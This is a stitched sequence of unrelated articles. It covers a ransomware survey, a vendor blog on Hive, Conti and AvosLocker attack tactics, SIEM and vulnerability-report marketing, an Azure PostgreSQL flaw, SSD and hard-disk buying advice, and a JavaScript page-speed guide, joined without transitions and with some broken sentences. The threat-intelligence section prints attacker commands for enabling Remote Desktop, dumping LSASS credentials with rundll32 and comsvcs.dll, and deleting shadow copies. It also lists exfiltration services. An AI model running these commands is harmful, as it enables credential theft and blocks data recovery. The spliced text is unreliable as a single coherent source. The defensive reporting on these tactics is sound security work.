Today Sophos has released the State of Ransomware 2022, its annual study of the real-world ransomware experiences of IT professionals working at the frontline around the globe.
The study has revealed an ever more challenging attack environment together with the growing financial and operational burden ransomware places on its victims. It also shines new light on the relationship between ransomware and cyber insurance, and the role insurance is playing in driving changes to cyber defenses.
This year, 5,600 IT professional from 31 countries participated in the research, with 965 sharing details of ransom payments made. Key findings include:
Ransom attacks are more frequent – 66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020
Ransom payments are higher – In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020, while the percentage of organizations paying less than $10,000 dropped to 21% from 34% in 2020. Overall, the average ransom paid by organizations that had data encrypted in their most significant ransomware attack, increased nearly fivefold to reach $812,360
More victims are paying the ransom – In 2021, 46% of organizations that had data encrypted in a ransomware attack paid the ransom. Twenty-six percent of organizations that were able to restore encrypted data using backups in 2021 also paid the ransom
The impact of a ransomware attack can be immense – The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. It took on average one month to recover from the damage and disruption. 90% of organizations said the attack had impacted their ability to operate, and 86% of private sector victims said they had lost business and/or revenue because of the attack
Many organizations rely on cyber insurance to help them recover from a ransomware attack – 83% of mid-sized organizations had cyber insurance that covers them in the event of a ransomware attack
Cyber insurance almost always pays out – In 98% of incidents where the victim had cyber insurance that covered ransomware, the insurer paid some or all the costs incurred (with 40% overall covering the ransom payment)
94% of those with cyber insurance said that their experience of getting it has changed over the last 12 months, with higher demands for cybersecurity measures, more complex or expensive policies and fewer organizations offering insurance protection
“The findings suggest we may have reached a peak in the evolutionary journey of ransomware, where attackers’ greed for ever higher ransom payments is colliding head on with a hardening of the cyber insurance market as insurers increasingly seek to reduce their ransomware risk and exposure,” said Chester Wisniewski, principal research scientist at Sophos.
“In recent years, it has become increasingly easy for cybercriminals to deploy ransomware, with almost everything available as-a-service. Second, many cyber insurance providers have covered a wide range of ransomware recovery costs, including the ransom, likely contributing to ever higher ransom demands. However, the results indicate that cyber insurance is getting tougher and in the future ransomware victims may become less willing or less able to pay sky high ransoms. Sadly, this is unlikely to reduce the overall risk of a ransomware attack. Ransomware attacks are not as resource intensive as some other, more hand-crafted cyberattacks, so any return is a return worth grabbing and cybercriminals will continue to go after the low hanging fruit.”
Sophos commissioned research agency Vanson Bourne to conduct an independent, vendor-agnostic survey of 5,600 IT professionals in mid-sized organizations (100-5,000 employees) across 31 countries. The survey was conducted during January and February 2022, and respondents were asked to respond based on their experiences over the previous year. Respondents were from Australia, Austria, Belgium, Brazil, Canada, chile, Colombia, Czech Republic, France, Germany, Hungary, India, Israel, Italy, Japan, Malaysia, Mexico, Netherlands, Nigeria, Philippines, Poland, Saudi Arabia, Singapore, South Africa, Spain, Sweden, Switzerland, Turkey, UAE, UK, and US.
Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.
Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.
Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:
Hive
Conti
Avoslocker
Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.
Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:
Gain persistence on the network
Escalate privileges
Tamper with and evade security software
Laterally move across the network
Initial Access
Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:
Spear phishing leading to the deployment of malware, including but not limited to:
IcedID
Emotet
QakBot
TrickBot
Taking advantage of weak RDP credentials
Exploiting vulnerabilities such as:
Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
Apache Log4j vulnerabily – CVE-2021-44228
In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.
Persistence
After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:
netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes
Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:
During the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:
ADRecon – Gathers Active Directory information and generates a report
Netscan – Discovers devices on the network
Credential Access
Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:
In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full
Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.
Lateral Movement
Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.
As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sccommands to disable or terminate them. In some cases they also use tools like PC Hunterto end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.
Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.
Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
We have also seen BCDEditbeing used to disable automatic system recovery and to ignore failures on boot:
Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:
https://anonfiles.com
https://mega.nz
https://send.exploit.in
https://ufile.io
https://www.sendspace.com
We have also seen attackers use the following tools for data exfiltration:
Filezilla
Rclone
Conclusion
The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.
Symantec Protection
Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.
AV Protection
Ransom.Hive
Ransom.Conti
Ransom.AvosLocker
Backdoor.Cobalt
Hacktool.Mimikatz
Trojan.IcedID*
Trojan.Emotet*
W32.Qakbot*
Trojan.Trickybot*
Behavioral Protection
SONAR.RansomHive!g2
SONAR.RansomHive!g3
SONAR.RansomHive!g4
SONAR.RansomAvos!g2
SONAR.RansomConti!g1
SONAR.RansomConti!g3
SONAR.RansomConti!g4
SONAR.Ransomware!g30
SONAR.RansomGregor!g1
SONAR.SuspLaunch!gen4
SONAR.SuspLaunch!g18
SONAR.Ransom!gen59
SONAR.Ransomware!g26
SONAR.Cryptlck!g171
Intrusion Prevention System (IPS) detections
IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.
The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.
Symantec recommends that you have intrusion prevention enabled on all your devices including servers.
Adaptive Protection
Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.
Recommendations
Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.
A company can accumulate massive amounts of information that security analysts are not able to monitor instantly. This can mean that priority security alerts either go unnoticed or are considered a false alarm because the appropriate technology is not available, which results in organizations failing to take action in time.
A Security Information and Event Management (SIEM) system specializes in prioritizing critical alerts over information received in real time, thus adapting to the needs of all organizations. This is achieved by incorporating multiple intelligence feeds and logs according to the criteria and needs set by the IT department. This makes it possible to categorize events and contextualize cybersecurity threat alerts.
The main benefits of having corporate SIEM systems are as follows:
A SIEM system ensures that alerts reach the right people so that they can carry out contextualized research and apply remediation mechanisms. This saves time as analysts are not required to interpret data from so many different sources.
It reduces the company’s costs, both in terms of infrastructure – by gaining full visibility into how the systems accessing the network are using it – and in terms of consuming resources. For example, a SIEM system can analyze the bandwidth machines are using and generate an event warning if one of them is consuming more resources than it should, which the IT department then checks for anomalies. SIEM enables better management of security resources, which translates into cost savings.
It restores cybersecurity configurations if they have been changed by mistake, which could leave an organization dangerously exposed to threats. SIEM can automatically detect a change in the configuration and generate an event to alert the company’s security analyst, who reviews the change and can restore the previous configuration if the new one is potentially hazardous to the company.
It detects operational maintenance activities in the business infrastructure that could pose a risk to the organization. Cybersecurity administrators incorporate the function of creating an event before a change to the company’s maintenance activities log, as well as in Windows. Then if there is any malicious activity they can decide whether or not to validate these adjustments.
It provides cyberattack control and protection in order to act before it becomes an irreversible problem, filtering whether it is a real attack or a false alarm. Known or unknown attacks are analyzed whether they are malwareless attacks (which resort to the legitimate tools of the system itself) or DDoS attacks or advanced persistent threats (APTs).
In the case of malware attacks, the usual security logs can send alerts for both real attacks and false alarms. To avoid alert saturation, SIEM solutions use event correlation to determine accurately whether or not it is a malware attack, as well as to detect the potential access points for the attack.
In DDoS attacks, SIEM is able to flag such an event from web traffic logs, prioritizing the event and sending it to an analyst for investigation before causing a slowdown or a total company service outage.
Finally, due to their complexity, when advanced persistent threats are detected they may not trigger alerts or be considered false alarms. Having a SIEM solution helps demonstrate a pattern of anomalous behavior, flagging it as a real concern for security analysts to investigate.
Given the differentiating value of this solution, WatchGuard has incorporated its SIEMFeeder module into WatchGuard EDR and EDPR to collect and correlate the status of IT systems, enabling organizations to turn large volumes of data into useful information for decision making.
Microsoft on Thursday disclosed that it addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region.
“By exploiting an elevated permissions bug in the Flexible Server authentication process for a replication user, a malicious user could leverage an improperly anchored regular expression to bypass authentication to gain access to other customers’ databases,” Microsoft Security Response Center (MSRC) said.
New York City-based cloud security company Wiz, which uncovered the flaws, dubbed the exploit chain “ExtraReplica.” Microsoft said it mitigated the bug within 48 hours of disclosure on January 13, 2022.
Specifically, it relates to a case of privilege escalation in the Azure PostgreSQL engine to gain code execution and a cross-account authentication bypass by means of a forged certificate, allowing an attacker to create a database in the target’s Azure region and exfiltrate sensitive information.
In other words, successful exploitation of the critical flaws could have enabled an adversary to gain unauthorized read access to other customers’ PostgreSQL databases, effectively circumventing tenant isolation.
Wiz traced the privilege escalation to a bug stemming as a result of modifications introduced in the PostgreSQL engine to harden its privilege model and add new features. The name ExtraReplica comes from the fact that the exploit leverages a PostgreSQL feature that permits copying database data from one server to another, i.e., “replicating” the database.
The Windows maker described the security vulnerability as affecting PostgreSQL Flexible Server instances deployed using the public access networking option, but stressed that it did not find evidence of the flaw being actively exploited and that no customer data was accessed.
“No action is required by customers,” MSRC said. “In order to further minimize exposure, we recommend that customers enable private network access when setting up their Flexible Server instances.”
You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”
Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.
As it’s likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn’t a moment to waste. So let’s drive straight in.
What is a Vulnerability Assessment Report and why do you need one?
A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.
A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.
The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:
— Customers need to trust you
Weaknesses in your IT systems could affect your customers’ operations. With supply chain attacks on the rise, a vulnerability in a single company could leave the whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.
It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.
— The Board wants a better understanding of the business’ risk
Cyber security is a growing concern across many businesses, so chances are your board members want to take a better grip of their risk, before the lack of insights into vulnerabilities is turned into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an “all clear” report, can give your business heads that needed peace of mind.
— Your auditors are checking for compliance
Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.
— Your CFO is renewing your cyber insurance
It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.
How often do you need to produce a vulnerability assessment report?
Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.
Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.
Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.
A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.
What should be included in a vulnerability assessment report?
Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.
As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.
Where can you get a Vulnerability Assessment Report from?
Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise; which can distract your security teams from other activities that will keep your organisation secure. That is why it’s recommended to choose an external provider to produce your reports.
Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.
Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.
At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.
It’s possible you’ve read somewhere or someone gave you the following advice: a bigger SSD is faster. That is correct. If you take a specific SSD drive model and compare its 250 GB size variant to the 1 TB variant, the bigger one will be faster.
Again, I can’t stress this enough: we’re talking about the same model from the same manufacturer – only the size differs.
In this whole idea, we’re talking about comparing something like the Kingston A400 240 GB model to the Kingston A400 960 GB model. In this example, even the manufacturer stats about 100 MB/s faster write performance.
Ok, but why is a bigger SSD faster?
To put it simply, a bigger SSD has more NAND chips ranks and more channels that they can use in parallel. This leads to faster data transfer. This is a lame simplified explanation.
This of course, varies from manufacturer to manufacturer and that is because there are different controllers out there, different things a manufacturer can do in the SSD’s firmware and so on. But usually, you’ll see a measurable difference between the low capacity drives and the higher capacity ones.
Consider the DRAM Cache
The way an SSD uses its cache is by placing data in this lower-latency area, called the cache, so future requests for that data can occur much faster. These caches are usually of two types: DRAM Cache or SLC Cache.
Fast SSDs, usually have a DRAM cache. The controller of the SSD actually has this dynamic random-access memory (DRAM). Do not confuse this with the SLC cache.
Why would you care? Well, bigger SSDs have a bigger DRAM cache. Just check Samsung’s datasheet for the 870 EVO – on page 3 you’ll see the 1TB, 2TB, and 4TB have bigger and bigger DRAM caches than the 250/500GB drives.
DRAM Cache and SLC Cache are completely different animals. Yes they both do the ‘cache’ action. They both have the purpose of accelerating the drive’s speed, but the cost and logic are different.
A DRAM cache is basically a separate chip in the PCB of your SSD. This DRAM chip is responsible for the work in your SSD, just as your system RAM is responsible for the operation of your PC. It temporarily stores data for the purpose of accelerating processing.
And because of the temporary storage function of the DRAM cache, many read and write processes can directly use the data in this cache – and it is a lot faster than starting from the beginning.
When we’re talking about the SLC cache, it is not a separate chip. Because it is called a cache and it is not really a true SLC NAND Flash chip, but a part of the space in the TLC or QLC’s NAND Flash IC, it simulates the SLC writing method. It simulates it as in it writes only 1 bit of data in each cell. This does improve the read/write performance of the SSD. But not as long or as much as a DRAM cache.
But! For an SSD without a DRAM cache, just a SLC Cache, the speeds will drop dramatically after that cache is exhausted from sequential writes – thye drop to the original value of the TLC NAND Flash. For these types of SSDs, without a DRAM cache, usually the indicated read/write speed in the tech specs are measured using the SLC Cache. (the test does not get to saturate the SLC cache and the average speed is higher. But if it were to be really tested, we’d see lower numbers once the SLC Cache can’t keep up)
The bottom line is: a drive without a DRAM Cache will not be able to sustain those advertised speeds for long.
Plus, a bigger DRAM Cache means you can abuse that drive more. By abusing, I mean giving it heavy workloads like a lot of writes/reads at once.
My 2cents? Never buy a DRAM-less SSD. SSDs that have a DRAM cache are so cheap nowadays it does not make sense to trade off the performance. Heck, I’ve seen DRAM-less SSDs a couple of bucks more expensive than the ones with a DRAM cache. I don’t know why.
How to tell if that SSD has a DRAM cache?
Just look up the datasheet on the manufacturer’s website. PCpartpicker also sometimes lists this specification in the Cache column.
If I’m in a hurry, if the manufacturer does not say anything about the DRAM cache, I will assume it has none. If I really want to know, just Google some review of that model.
TBW – total bytes written
A specification where bigger drives win again, as they allow for more writes before failure.
To be fair, a normal gamer/user will probably never saturate this even if we’re talking about a small drive. It takes a lot of work to actually write so much data and usually… you’ll probably want to upgrade to a bigger or faster drive before your old SSD will fial.
Nonetheless, it is worth mentioning that the TBW figure is also bigger in a bigger SSD.
Always try to buy bigger and with DRAM Cache
Enough said. Spending a little more for a bigger drive with a DRAM cache is always worth it. Always!
Examples of popular SSDs that do have a DRAM cache:
Do note that the list above is not complete. I’m sure I’ve missed some. Those are just some popular drives that I can actually recommend if you are looking for suggestions on what to buy – and always strive to get the biggest capacity you can afford!
Final thoughts
If there is something to remember from this whole article is this: buy as big as your budget allows you and always buy an SSD that has a DRAM Cache. These two ideas will guarantee that you’ll not be disappointed with your new SSD.
Buying a hard disk used to be quite easy. Now we have stuff like CMR vs SMR drives, manufacturers not being completely clear in their product showcase pages, and so on.
TLDR: To keep things short, you should strive to buy a CMR drive because SMR drives, while they work just fine, are usually slower in every typical individual test carried by a lot of people out there. SMR drives are slower as their method of writing data aims for storage density, and one of the drawbacks of this goal is speed.
And before we continue, yes, even if manufacturers have developed firwmare that optimize the read and write performance for SMR drives, they are still not that great as a CMR drive.
Tip: some great benchmarks for hard disk drives are: Crystal Disk Mark, ATTO Disk Benchmark, HD Tune, and even PCMark has some storage benchmarks.
CMR or PMR drives – how they work
CMR comes from Conventional Magnetic Recording. It is also known as PMR that comes from Perpendicular Magnetic Recording.
The way CMR works is by aligning the poles of the magnetic elements, which represent bits of data perpendicularly to the surface of the disk. The magnetic tracks are written side-by-side without overlapping.
And because the write head is usually quite large in comparison to the read head, HDD manufacturers aim to shrinking the size of the write head – or do it as much as possible.
SMR – how do these drives work?
Shingled Magnetic Recording, or SMR, is an extension to PMR. It basically offers improved density. And this happens because rather than writing each magnetic track without overlapping, SMR overlaps each new track with part of the previous track. One way to think about it is by comparing it to the shingles on a roof.
By overalapping the tracks, write heads become a lot thinner, and we get a bigger areal density.
CMR vs SMR drives – why does it actually matter?
In short, because you want the best performance for your dollar.
But to get a little bit more technical, regardless of whether an HDD uses CMR or SMR when some new data is written on the drive, the tracks are fully readable without performance impact.
So we have a pretty good read speed, right? No matter what we choose? Right? Kind of. Not really. Well, it depends on how you use the drive.
But! On an SMR drive, when any data is edited or overwritten, the write head will not overwrite data on the existing magnetic track. It will write the new data on an empty area of the disk. While the original track with the old data will temporarily sit put. Then, when the SMR HDD becomes idle, it will enter a ‘reorganization mode’, where the old bits of data on the original track are being erased and made available for future use.
This reorganization procedure must occur and makes idle time essential on an SMR drive. If you hit the respective SMR drive hard with write and read operations, it won’t get to do this in a fast way, and the drive will have to write new data and reorganize stuff at the same time. This causes an impact on the overall read and write performance of the drive.
How can I tell if the HDD I want to buy is SMR or CMR?
Some manufacturers make it easy, some not so much. But basically, searching with something like ‘product code SMR or CMR’ on Google will lead you to a good result most of the time.
Now, Western Digital, on their homepage in the shop section, actually lists CMR or SMR for their drives in the ‘Full Specifications’ area, at the Recording Technology specification. Neat!
For Seagate, however, you have to go to the product page, and download the PDF datasheet. Oh well, I guess it works.
Here’s a breakdown of what is what usually, at least for the common models. Please, search online or on the manufacturer’s website in case the below data becomes outdated.It was last looked up in 29.01.2022, on the manufacturers’ websites, just so you know.
But if you get an amazing price, and you know that hard drive will not get a lot of writes, edits, and deletions… well, it might make sense since the actual heavy usage of erasing,editing and writing data is causing the ‘slowness’. Like if you were to just fill it up with movies and that’s it. Those movies will not get edited, deleted or anything – they will just be read when you watch them. I guess – thinking about selfhosting something like Plex or Nextcloud… or a DIY NAS. I’d still opt for a CMR drive – what kind of discount are we talking about, to be fair? 10% is not worth it in my opinion.
Closing thoughts
Basically, aim for a CMR drive. And if you are new to the whole computer parts upgrade or stuff… don’t stress if you are buying a NAS drive for your desktop PC. It does not matter, it will work the same – maybe even last longer!
Hard disk buying is now as tedious as buying another component, I guess – one more thing to look for besides the usual specifications. I do hope that testing, developing, and working with diverse methods and technologies of storing data will eventually lead to manufacturers developing more performant and higher density hard disks. Just imagine a 100 TB HDD! That would be insane.
I hope this article helped you figure out what you need – an SMR or a CMR drive and why it matters.
Learn how to Defer Parsing of JavaScript to improve pagespeed score. And how you can fix ‘Eliminate render-blocking of JavaScript’ warning in Google PageSpeed Insights by deferring non-critical JavaScript(s). The newer version of Google PageSpeed Insight refers to this issue as ‘Eliminate render-blocking resources’; these render-blocking resources may include JavaScripts and CSS.
In this article, I will cover what is defer parsing of JavaScript, how to defer parsing of JavaScript properly, why you should defer parsing JavaScript, how to find render-blocking JavaScript(s) which are to be deferred, how to defer multiple JavaScripts in one go, how you can defer parsing of JavaScript in WordPress with or without plugin and how does deferred loading of JavaScript help to speed up your website?
In a nutshell, we’ll eliminate render-blocking JavaScript(s) not by actually removing (deleting) them from the website code but by defer loading them. So that they stop blocking the loading (rendering) of meaningful content (the first paint) of the website.
These terms (the above terminology) might be overwhelming for you at first, especially if you’re not a tech guy.
But, don’t worry about that!
I am going to explain everything step by step in simple words. So that you can proceed at your pace and implement the methods to fix ‘Eliminate render-blocking resources’ on your website/blog.
A web page is made of up several components which include HTML, CSS/Stylesheets, JavaScript, and graphical (images & icons) components etc. These components are stacked one over another in the code structure of the web page.
When a user types your website URL in the web browser’s address bar and hit enter. The browser first establishes the connection with the server on which your website is hosted.
Once the connection is established, the browser starts rendering the components of the webpage to display the web page.
The browser renders the components serially from the top towards the bottom of the webpage. That means what comes first rendered first and so on.
When the browser encounters JavaScript on a web page, it downloads the JavaScript, executes it, and then proceeds to render the next component. So during this time browser stop rendering the rest of the web page.
Every time the browser encounters JavaScript, it stops rendering the rest of the webpage until it renders and executes the encountered JavaScript.
That’s how JavaScript blocks the critical rendering path.
To avoid this situation, Google Engineers recommend deferring non-critical JavaScript.
The question still remains the same, What is Defer Parsing of JavaScript?
Defer Parsing of JavaScript can be defined as the process of using defer or async attribute with JavaScript to avoid render blocking of the first paint of a web page. These attributes tell the web browser to parse and execute the JavaScript in parallel (asynchronously) or after (defer) the parsing of HTML of a web page. Thus, the visitors need not wait longer to see the meaningful content of the web page.
Difference between defer or async
Now you know that there are two attributes – defer or async; that can be used to defer javascript loading.
Before we talk about the difference between defer and async, let’s see how does <script> tag works.
Legend
<script>
When we use <script> tag to add script in our code, the HTML is keep parsing till the script file is reached, then onwards parsing will be paused until the script file is downloaded and executed.
Suitability: Not recommended in most cases.
<script defer>
When defer attribute is appended with script tag, the script file is downloaded alongside the HTML parsing but the downloaded script executes only after the completion of HTML parsing.
Suitability: For non-critical script files.
<script async>
When async attributed is used with script tag, the script file downloads during HTML parsing, then HTML parsing pauses just to execute the downloaded-script file.
Suitability: For critical script files that cannot be inline.
Defer loading of JS & PageSpeed Insights recommendation
Let’s try to put this in a perspective with Google PageSpeed Insights warning and recommendation.
When you test, a website using Google Pagespeed Insights Tool, you get some warnings and recommendations to fix those warnings/errors.
The PageSpeed Insights (PSI) text for render-blocking resourcessays,
Eliminate render-blocking resources.
Resources are blocking the first paint of your page. Consider delivering critical JS/CSS inline and deferring all non-critical JS/styles.
This warning triggers for two different elements i.e. JavaScript (JS) and CSS when any of them block the critical rendering path 1 during the website loading. Here in this article, we are discussing the JavaScript part.
(In the previous version of PageSpeed Insights Tool, the same warning (for the JavaScript) used to be called ‘Eliminate render-blocking of JavaScript’.)
In simple words, this warning triggers when there are some JavaScript(s) loading on your website which blocks the loading of the content that matters most to your visitors.
This means your visitors have to wait longer to see the meaningful content of your website because JavaScript(s) are blocking the rendering of content.
Clearly, Pagespeed Insights or other site speed testing tools (GTMetrix, etc.) show this warning/error, if your site loads some JavaScript(s) that block the loading of meaningful content (the first paint) of your site.
And this needs to be fixed.
Critical vs Non-critical JavaScript: Explained
As Google PageSpeed Insights (PSI) recommendation says you should deliver critical JSinline and defer all non-critical JS.
What does this mean?
Let’s break that down by terminology.
Critical JavaScripts: JavaScripts that are necessary to load during optimized critical rendering.
Non-critical JavaScripts: Those JS that can wait to load until the first meaningful content (the first paint) of the webpage has loaded.
Inline Delivery: Inline delivery refers to loading a resource (in this case JS) within the HTML code instead of calling/importing that separately.
Curious? Why does JavaScript block the critical rendering path in the first place?
We’ll discuss that in the next section with other reasons why you should Defer JavaScript Parsing.
First of all, JavaScript(s) is one of the major culprits to make your website slow.
Wondering, why is that?
Because when the web browser comes across a script, it executes the script firstbefore continuing to load HTML that includes the content users are looking for.
For a browser, executingJavaScript is a heavier task (depending on the size of the script) and takes more time as compared to rendering the meaningful content (the first paint) of the webpage.
Hence JavaScript affects the critical rendering path and slows down pagespeed of your website.
Why not defer this heavier task of JS execution so that the critical rendering path remains uninterrupted, right?
Pagespeed: is now a Ranking Factor
Site speed has already become a ranking signal.
About a decade ago Google announced 2 in an official blog post on Google Webmaster Central Blog that site speed has become a ranking signal.
In another blog post published on the Official Webmaster Central Blog in 2018, they revealed 3 that Google started using page speed as a ranking factor in mobile search ranking.
Since Google had declared pagespeed a factor in search result rankings for desktop and mobile. Therefore, site speed optimization has become a significant aspect of technical SEO.
For the same reason, Google PageSpeed Insights Tool recommends deferred parsing of JavaScript as one of the solutions 4 to remove render-blocking JavaScript in above-the-fold content.
User Experience: decides Your Site’s Success
How does JavaScript affect user experience (UX)?
We have already discussed that JavaScript(s) slow down the pagespeed by blocking the rendering of first paint (the meaningful content). That led to more loading time and a longer wait for users to see the content; bad user experience, right.
Speed matters a lot, the truth is users do not like slow-loading websites. In fact, studies show that the users leave a slow loading site early and move on.
On the contrary, you want your website audience to engage with your site and eventually turn into a customer, subscriber, or ad-viewer. In order to make that happen, you need to improve your pagespeed by deferring non-critical JavaScript(s).
Reasons to Defer Loading of JavaScript: Summing it up
As I mentioned above, however, the parser (browser) starts downloading and executing the script over parsing the rest of HTML, whenever it encounters the script.
But the fact is, most of the JavaScript(s) come into use when the complete web page is loaded. For example, in some animation, effect, or functionality, etc.
Therefore, it is a good idea to load JavaScript(s) only after the content has loaded.
This way deferred loading of JavaScript does not affect the critical render path and consequently helps to speed up your website. And hence, a better user experience for your readers.
And by making your site load faster, you also improve your search ranking on desktop as well as mobile.
Do you know, good web hosting is a must for better pagespeed? If you are already using good web hosting? Awesome, let’s skip to defer parsing of JavaScript. Not sure? whether your hosting is as good as your website deserves, don’t worry. We recommend Cloudways and Kinsta Hosting for better sitespeed. Read our Kinsta Review.
